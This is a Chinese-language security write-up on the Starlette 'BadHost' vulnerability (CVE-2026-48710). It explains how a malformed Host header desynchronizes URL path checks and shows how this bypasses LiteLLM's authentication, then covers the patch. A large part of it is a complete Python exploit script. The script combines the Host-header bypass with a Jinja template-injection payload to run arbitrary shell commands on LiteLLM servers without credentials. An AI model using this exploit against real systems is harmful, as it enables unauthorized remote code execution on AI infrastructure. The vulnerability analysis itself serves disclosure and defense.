CVE-2026-48710: Starlette BadHost
背景
今年 5 月 OSTIF 披露了一个 Starlette 的漏洞,命名为 “BadHost”,漏洞编号 CVE-2026-48710。
真正值得关注的点并不只是 Starlette 本身。Starlette 作为 Python ASGI 生态里的底座之一被许多上层应用依赖,一个典型的例子是 FastAPI,它依赖 Starlette 实现了完整的请求解析、路由分发和中间件机制。这意味着只要上层框架或产品依赖了受影响版本的 Starlette就有可能产生权限绕过的问题。
这条传播链在 AI 基础设施里变的尤为明显,过去两年很多 LLM 服务都选择使用 Starlette 构建,常见如 LiteLLM、vLLM、FastMCP 等流行的 AI 基础设施均受此漏洞影响。
漏洞原理
BadHost 漏洞的触发条件可以分为三个组成部分:
- 底层框架(Starlette)使用 Host 头重建 URL
- URL 重建结果和 ASGI scope 中的 path 存在差异
- 下游代码信任
request.url.path并用其做权限校验
BaseHTTPMiddleware 拿到 request 后转换为 _CachedRequest 并调用 dispatch_func 继续执行。
class BaseHTTPMiddleware: def __init__(self, app: ASGIApp, dispatch: DispatchFunction | None = None) -> None: self.app = app self.dispatch_func = self.dispatch if dispatch is None else dispatch
async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: if scope["type"] != "http": await self.app(scope, receive, send) return
request = _CachedRequest(scope, receive) ... response = await self.dispatch_func(request, call_next)后续在鉴权中间件获取到的 Request 即为 _CachedRequest,request.url 作为属性懒加载:
@propertydef url(self) -> URL: if not hasattr(self, "_url"): # pragma: no branch self._url = URL(scope=self.scope) return self._urlURL 初始化时通过 scope 获取真实 path 并从 headers 中解析 Host 头拼接作为完整的 URL。
class URL: def __init__( self, url: str = "", scope: Scope | None = None, **components: Any, ) -> None: if scope is not None: assert not url, 'Cannot set both "url" and "scope".' assert not components, 'Cannot set both "scope" and "**components".' scheme = scope.get("scheme", "http") server = scope.get("server", None) path = scope["path"] query_string = scope.get("query_string", b"")
host_header = None for key, value in scope["headers"]: if key == b"host": host_header = value.decode("latin-1") break
if host_header is not None: url = f"{scheme}://{host_header}{path}" elif server is None: url = path else: host, port = server default_port = {"http": 80, "https": 443, "ws": 80, "wss": 443}[scheme] if port == default_port: url = f"{scheme}://{host}{path}" else: url = f"{scheme}://{host}:{port}{path}"
if query_string: url += "?" + query_string.decode() elif components: assert not url, 'Cannot set both "url" and "**components".' url = URL("").replace(**components).components.geturl()
self._url = url这里没有校验 Host 头是否符合 RFC 规范就直接拼接了,而后续的 request.url.* 的一系列字段方法均依赖于 self.components 字段。
@propertydef scheme(self) -> str: return self.components.scheme
@propertydef netloc(self) -> str: return self.components.netloc
@propertydef path(self) -> str: return self.components.path
@propertydef query(self) -> str: return self.components.queryself.components 是通过 urlsplit 重新解析后的 URL 对象。
@propertydef components(self) -> SplitResult: if not hasattr(self, "_components"): self._components = urlsplit(self._url) return self._components意味着攻击者将 Host 设置为 x/?,那么最终的 self._url 就会被拼接为:
<schema>://x/?<path>与此同时,路由分发使用的路径并不是 request.url.path 而是未被污染的 scope["path"]。
def matches(self, scope: Scope) -> tuple[Match, Scope]: path_params: dict[str, Any] if scope["type"] == "http": route_path = get_route_path(scope) match = self.path_regex.match(route_path) if match: matched_params = match.groupdict() for key, value in matched_params.items(): matched_params[key] = self.param_convertors[key].convert(value) path_params = dict(scope.get("path_params", {})) path_params.update(matched_params) child_scope = {"endpoint": self.endpoint, "path_params": path_params} if self.methods and scope["method"] not in self.methods: return Match.PARTIAL, child_scope else: return Match.FULL, child_scope return Match.NONE, {}
def get_route_path(scope: Scope) -> str: path: str = scope["path"] root_path = scope.get("root_path", "") if not root_path: return path
if not path.startswith(root_path): return path
if path == root_path: return ""
if path[len(root_path)] == "/": return path[len(root_path) :]
return path此时后端获取到的 request.url.path 为 /,但 scope 里的又是真实的 <path>,由此产生差异。
一个存在漏洞的鉴权中间件示例:
from starlette.middleware.base import BaseHTTPMiddlewarefrom starlette.responses import JSONResponse
class VulnerableAuthMiddleware(BaseHTTPMiddleware): async def dispatch(self, request, call_next): path = request.url.path # 这里获取到的是 `/`
if path.startswith("/admin"): # 绕过权限校验 token = request.headers.get("authorization")
if token != "Bearer secret-token": return JSONResponse( {"detail": "Unauthorized"}, status_code=401, )
# 直接调用后续真实业务逻辑代码! return await call_next(request)真实世界的案例:LiteLLM
LiteLLM Proxy 是一个典型的 AI Gateway。它用 FastAPI 暴露 OpenAI 系列 API,同时在请求入口做 virtual key、用户角色、allowed routes、预算、模型权限等检查。
在受影响版本中,LiteLLM 的鉴权逻辑不是直接使用 ASGI scope["path"],而是封装了一个 get_request_route() 辅助函数。以 v1.83.14-stable 为例,这个函数的核心逻辑是:
def get_request_route(request: Request) -> str: try: if hasattr(request, "base_url") and request.url.path.startswith( request.base_url.path ): return request.url.path[len(request.base_url.path) - 1 :] else: return request.url.path except Exception: return request.url.path也就是说,LiteLLM 的中心鉴权链路依赖的是 request.url.path,这会直接影响 LiteLLM 的 route-based 鉴权逻辑。在 user_api_key_auth 中,LiteLLM 会先计算:
route: str = get_request_route(request=request)随后用这个 route 判断是否为 public route:
if ( route in LiteLLMRoutes.public_routes.value or route_in_additonal_public_routes(current_route=route)): return UserAPIKeyAuth(user_role=LitellmUserRoles.INTERNAL_USER_VIEW_ONLY)而 / 正好在 LiteLLM 的 public_routes 中,于是攻击链变成:
- 攻击者请求后台接口如
/prompts/test - 通过畸形 Host 让
request.url.path被解析成/ - LiteLLM 鉴权层实现认为请求的是公共路由于是把请求交给后续 Handler
结合 BadHost 权限绕过与之前披露的后台 SINK实现未授权远程代码执行。
import argparseimport jsonimport socketimport sslimport sysfrom base64 import b64decodefrom typing import Optional, Tuplefrom urllib.parse import urlparse
class Logger: COLORS = {'DEBUG': '\033[36m', 'INFO': '\033[32m', 'ERROR': '\033[31m', 'FATAL': '\033[35m'}
def __init__(self, verbose=False): self.verbose = verbose
def _log(self, level, msg): print(f"{self.COLORS.get(level, '')}[{level.lower()}]\033[0m {msg}")
def debug(self, msg): if self.verbose: self._log('DEBUG', msg)
def info(self, msg): self._log('INFO', msg)
def error(self, msg): self._log('ERROR', msg)
def fatal(self, msg): self._log('FATAL', msg) sys.exit(1)
class LiteLLMBadHostExploit: BADHOST = "x/?"
def __init__(self, target, command, proxy=None, verbose=False): self.target = target.rstrip('/') self.command = command self.logger = Logger(verbose=verbose)
parsed = urlparse(self.target) self.host = parsed.hostname self.port = parsed.port or (443 if parsed.scheme == 'https' else 80) self.use_tls = parsed.scheme == 'https' self.proxy = urlparse(proxy) if proxy else None
def run(self): self.logger.info(f"Target: {self.target}") self.logger.info(f"Command: {self.command}")
result = self._execute_command(self.command) if result is None: self.logger.fatal("Command execution failed")
self.logger.info("Output:") print('\t' + result.replace('\n', '\n\t'))
def _execute_command(self, command: str) -> Optional[str]: payload = ( "---\nmodel: gpt-4o\n---\n\nUser: " "{% for c in ().__class__.__bases__[0].__subclasses__() %}" "{% if c.__name__ == \"catch_warnings\" %}" "{% set result = c.__init__.__globals__[\"sys\"].modules[\"os\"]" ".popen(\"" + command + "| base64 -w0\").read() %}" "{{ c.__init__.__globals__[\"__builtins__\"][\"exec\"](" "\"raise Exception('\" + result + \"')\") }}" "{% endif %}{% endfor %}" )
json_body = '{"dotprompt_content": "' + _to_unicode(payload) + '"}' self.logger.debug(f"Payload size: {len(json_body)} bytes")
status, body = self._raw_request('POST', '/prompts/test', json_body) self.logger.debug(f"Response: {status}")
if not body: return None
try: detail = json.loads(body).get('detail', '') if not detail: self.logger.debug(f"Response body: {body[:200]}") return None return b64decode(detail.encode()).decode() except Exception as e: self.logger.debug(f"Decode error: {e}, raw: {body[:200]}") return None
def _raw_request(self, method: str, path: str, body: str) -> Tuple[Optional[str], str]: try: sock = self._connect()
if self.use_tls: ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE sock = ctx.wrap_socket(sock, server_hostname=self.host)
raw = ( f"{method} {path} HTTP/1.1\r\n" f"Host: {self.BADHOST}\r\n" f"Content-Type: application/json\r\n" f"Content-Length: {len(body.encode())}\r\n" f"Connection: close\r\n" f"\r\n" f"{body}" )
self.logger.debug(f">>> {method} {path}") sock.sendall(raw.encode())
response = b'' while True: try: chunk = sock.recv(8192) if not chunk: break response += chunk except socket.timeout: break
sock.close() text = response.decode(errors='replace') status_line = text.split('\r\n')[0] if text else None body_start = text.find('\r\n\r\n') resp_body = text[body_start + 4:] if body_start > 0 else '' return status_line, resp_body
except (socket.error, OSError) as e: self.logger.error(f"Connection failed: {e}") return None, ''
def _connect(self) -> socket.socket: if self.proxy and self.use_tls: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) sock.connect((self.proxy.hostname, self.proxy.port or 8080)) connect = f"CONNECT {self.host}:{self.port} HTTP/1.1\r\nHost: {self.host}:{self.port}\r\n\r\n" sock.sendall(connect.encode()) resp = sock.recv(4096).decode() if '200' not in resp: raise ConnectionError(f"Proxy CONNECT failed: {resp.strip()}") return sock
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) sock.connect((self.host, self.port)) return sock
def _to_unicode(s: str) -> str: return ''.join(f'\\u{ord(c):04x}' for c in s)
if __name__ == '__main__': parser = argparse.ArgumentParser( description='LiteLLM BadHost RCE (CVE-2026-48710 + SSTI)', epilog='Example: python exploit_badhost.py -t http://target:4000 -c "id"' ) parser.add_argument('-t', '--target', required=True) parser.add_argument('-c', '--command', required=True) parser.add_argument('--proxy', default=None) parser.add_argument('-v', '--verbose', action='store_true') args = parser.parse_args()
print("\033[31m[*] LiteLLM BadHost RCE \u2014 CVE-2026-48710 + SSTI\033[0m") print("\033[31m[*] No credentials required\033[0m\n")
LiteLLMBadHostExploit( target=args.target, command=args.command, proxy=args.proxy, verbose=args.verbose, ).run()新版本中,LiteLLM 把 get_request_route() 改成优先读取 request.scope["path"],并显式更新了 Starlette 的依赖版本。
def get_request_route(request: Request) -> str: """ Resolve the request route from the ASGI scope, with ``root_path`` stripped.
Prefer this over ``request.url.path`` for any auth, ACL, routing, or audit-log decision: Starlette reconstructs ``url.path`` by interpolating the Host header into a URL string and re-parsing with ``urlsplit``, so a malformed Host (e.g. ``localhost/?x=1``) collapses ``url.path`` to ``"/"`` while FastAPI continues to dispatch on ``scope["path"]``. ``scope["path"]`` is uvicorn's parse of the HTTP request line and matches the actual handler, so it's the authoritative route.
Also normalizes sub-path deployments by stripping ``scope["root_path"]`` e.g. ``/genai/chat/completions`` -> ``/chat/completions``. """ try: scope = request.scope if not isinstance(scope, dict): return str(request.url.path) raw_path: str = str(scope.get("path", request.url.path)) root_path: str = str( scope.get("app_root_path", scope.get("root_path", "")) ).rstrip("/") if not isinstance(raw_path, str): return str(request.url.path) # Strip root_path only when it matches whole path segments — guarding # against sibling paths like "/apifoo" being truncated under # root_path="/api". Trailing slashes on root_path are stripped above, # so bare "/" or "/prefix/" still leave the leading "/" intact. if root_path and ( raw_path == root_path or raw_path.startswith(root_path + "/") ): stripped = raw_path[len(root_path) :] return stripped or "/" return raw_path except Exception as e: verbose_proxy_logger.debug( f"error on get_request_route: {str(e)}, defaulting to request.url.path={request.url.path}" ) return str(request.url.path)